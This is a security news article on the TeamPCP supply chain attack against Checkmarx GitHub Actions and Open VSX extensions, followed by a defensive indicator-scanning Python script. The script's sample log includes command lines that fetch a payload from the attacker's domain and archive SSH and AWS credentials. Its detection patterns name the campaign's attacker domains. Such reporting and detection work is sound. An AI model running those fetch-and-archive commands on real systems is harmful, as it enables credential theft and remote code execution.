
TeamPCP Hacks Checkmarx GitHub Actions Utilizing Stolen CI Credentials

Two more GitHub Actions workflows have become the latest to be compromised by credential-stealing malware from a threat actor known as TeamPCP, the cloud-native cybercriminal operation also behind the Trivy supply chain attack.

The workflows, both maintained by the supply chain security company Checkmarx, are listed below –

Cloud security company Sysdig said it observed an identical credential stealer to the one used in TeamPCP's operations targeting Aqua Security's Trivy vulnerability scanner and its related GitHub Actions, about four days after the breach on March 19, 2026. The Trivy supply chain compromise is being tracked under the CVE identifier CVE-2026-33634 (CVSS score: 9.4).

"This implies that the stolen credentials from the Trivy compromise were used to poison additional actions in affected repositories," Sysdig said.

The stealer, dubbed "TeamPCP Cloud stealer," is designed to steal credentials and secrets related to SSH keys, Git, Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Kubernetes, Docker, .env files, databases, and VPNs, along with CI/CD configurations, data from cryptocurrency wallets, and Slack and Discord webhook URLs.

As in the case of Trivy, the threat actors have been found to force-push tags to malicious commits containing the stealer payload ("setup.sh"). The stolen data is exfiltrated to the domain "checkmarx[.]zone" (IP address: 83.142.209[.]11:443) in the form of an encrypted archive ("tpcp.tar.gz").


The new version creates a "docs-tpcp" repository using the victim's GITHUB_TOKEN to stage the stolen data as a backup method if the exfiltration to the server fails. In the Trivy incident, the threat actors used the repository name "tpcp-docs" instead.

"The use of vendor-specific typosquat domains for each poisoned action is a deliberate deception technique," Sysdig said. "An analyst reviewing CI/CD logs would see curl traffic to what appears to be the action's own vendor domain, reducing the likelihood of manual detection."

The fact that the stealer's primary function is to harvest credentials from CI runner memory allows the operators to extract GitHub personal access tokens (PATs) and other secrets at the moment a compromised Trivy action executes in a workflow. To make matters worse, if those tokens have write access to repositories that also use Checkmarx actions, the attacker can weaponize them to push malicious code.

This, in turn, opens the door to a cascading supply chain compromise, where one poisoned action captures secrets that are then used to poison other actions.

"The identical payload, encryption scheme, and tpcp.tar.gz naming convention confirm this is the same threat actor expanding their reach beyond the initial Trivy compromise," Sysdig noted. "Code review and dependency scanning failed here because the malicious code was injected into a trusted action at the source."


According to Wiz, the attack appears to have been carried out via the compromise of the "cx-plugins-releases" service account, with the attackers also publishing trojanized versions of the "ast-results" (version 2.53.0) and "cx-dev-assist" (version 1.7.0) Open VSX extensions. The VS Code Marketplace versions are not affected.

Once the extension is activated, the malicious payload checks whether the victim has credentials for at least one cloud service provider, such as GitHub, AWS, Google Cloud, and Microsoft Azure. If any credentials are detected, it proceeds to fetch a next-stage payload from the same domain ("checkmarx[.]zone").

"The payload attempts execution via npx, bunx, pnpx, or yarn dlx. This covers major JavaScript package managers," Wiz researchers Rami McCarthy, James Haughom, and Benjamin Read said. "The retrieved package contains a comprehensive credential stealer. Harvested credentials are then encrypted, using the keys as elsewhere in this campaign, and exfiltrated to 'checkmarx[.]zone/vsx' as tpcp.tar.gz."

"On non-CI systems, the malware installs persistence via a systemd user service. The persistence script polls https://checkmarx[.]zone/raw every 50 minutes for additional payloads, with a kill switch that aborts if the response contains "youtube". Currently, the link redirects to The Show Must Go On by Queen."


To mitigate the threat, users are advised to perform the following actions with immediate effect –

  • Rotate all secrets, tokens, and cloud credentials that were accessible to CI runners during the affected window.
  • Audit GitHub Actions workflow runs for any references to tpcp.tar.gz, scan.aquasecurity[.]org, or checkmarx[.]zone in runner logs.
  • Search the GitHub organization for repositories named "tpcp-docs" or "docs-tpcp," which indicate successful exfiltration via the fallback mechanism.
  • Pin GitHub Actions to full commit SHAs rather than version tags, as tags can be force-pushed.
  • Monitor outbound network connections from CI runners to suspicious domains.
  • Restrict the Instance Metadata Service (IMDS) from CI runner containers using IMDSv2.
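The three audit steps above (check runner logs for the named indicators, check the organization for the fallback repositories, and find actions still pinned to mutable tags) can be run as one script. The following is an added example written for this article, not tooling from Sysdig, Wiz, Checkmarx, or Aqua; it uses only the indicators the article names (tpcp.tar.gz, scan.aquasecurity[.]org, checkmarx[.]zone, 83.142.209[.]11, the "tpcp-docs"/"docs-tpcp" repository names). The workflow file, the log lines, the action names in them and the 40-hex pin value are constructed samples, and the `uses:` parser is a plain regex rather than a full YAML parser.

```python
"""Defender-side checks for the TeamPCP action-poisoning campaign.

Added example (not code from the article or any vendor). Only the indicators
the article names are used; all sample inputs below are constructed.
"""
from __future__ import annotations

import re

# Indicators from the article, written un-defanged so they match raw runner logs.
IOC_PATTERNS = [
    re.compile(r"tpcp\.tar\.gz"),
    re.compile(r"scan\.aquasecurity\.org"),
    re.compile(r"checkmarx\.zone"),
    re.compile(r"\b83\.142\.209\.11\b"),
]

# Repository names the stealer creates as its fallback drop (per the article).
FALLBACK_REPO_NAMES = {"tpcp-docs", "docs-tpcp"}

# Matches `uses: owner/repo[/path]@ref`. Local (./...) and docker:// references
# have no "owner/repo@ref" shape, so they are skipped: SHA pinning does not apply.
USES_RE = re.compile(
    r"^\s*-?\s*uses:\s*['\"]?([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@([^'\"\s#]+)"
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def find_unpinned_uses(workflow_text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, action, ref) for every `uses:` step whose ref is not
    a full 40-hex commit SHA. Tags and branches can be force-pushed, which is
    how the poisoned action tags in this campaign were served."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        m = USES_RE.match(line)
        if m and not FULL_SHA_RE.match(m.group(2)):
            findings.append((lineno, m.group(1), m.group(2)))
    return findings


def scan_log_lines(lines) -> list[tuple[int, str]]:
    """Return (line_number, matched_indicator) for each runner log line that
    contains one of the article's indicators of compromise."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for pat in IOC_PATTERNS:
            m = pat.search(line)
            if m:
                hits.append((lineno, m.group(0)))
    return hits


def fallback_repos(repo_names) -> list[str]:
    """Filter an organization's repository listing for the stealer's fallback
    repository names (case-insensitive, so renamed-case variants still surface)."""
    return [name for name in repo_names if name.lower() in FALLBACK_REPO_NAMES]


# --- Constructed sample inputs (not real data from any incident) ---------------
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: example-org/checkout-action@a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3d4
      - uses: example-vendor/scanner-action@v1.2.3
      - uses: another-vendor/lint-action@main
      - uses: ./.github/actions/local-step
"""

SAMPLE_LOG = [
    "Run example-vendor/scanner-action@v1.2.3",
    "+ curl -fsSL https://checkmarx.zone/setup.sh -o setup.sh",
    "Scanning image ubuntu:22.04 ... done",
    "+ tar czf tpcp.tar.gz ~/.ssh ~/.aws",
    "Build succeeded",
]

SAMPLE_REPOS = ["infra", "Docs-TPCP", "website", "tpcp-docs"]


if __name__ == "__main__":
    for lineno, action, ref in find_unpinned_uses(SAMPLE_WORKFLOW):
        print(f"workflow line {lineno}: {action} pinned to mutable ref {ref!r}")
    for lineno, ioc in scan_log_lines(SAMPLE_LOG):
        print(f"log line {lineno}: indicator {ioc!r}")
    for repo in fallback_repos(SAMPLE_REPOS):
        print(f"fallback exfiltration repository present: {repo}")
```

Point `find_unpinned_uses` at each file under `.github/workflows/`, feed `scan_log_lines` the downloaded run logs for the affected window, and feed `fallback_repos` the repository names returned by the organization's repository listing; any hit from the last two checks should be treated as confirmation that the credential-rotation step above is required, not optional.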

In the days following the initial breach, TeamPCP actors have pushed malicious Docker images of Trivy containing the same stealer and hijacked the company's "aquasec-com" GitHub organization to tamper with dozens of internal repositories.

They have also been observed targeting Kubernetes clusters with a malicious shell script that wipes all machines when it detects systems matching the Iranian time zone and locale, highlighting a new escalation of the group's modus operandi.
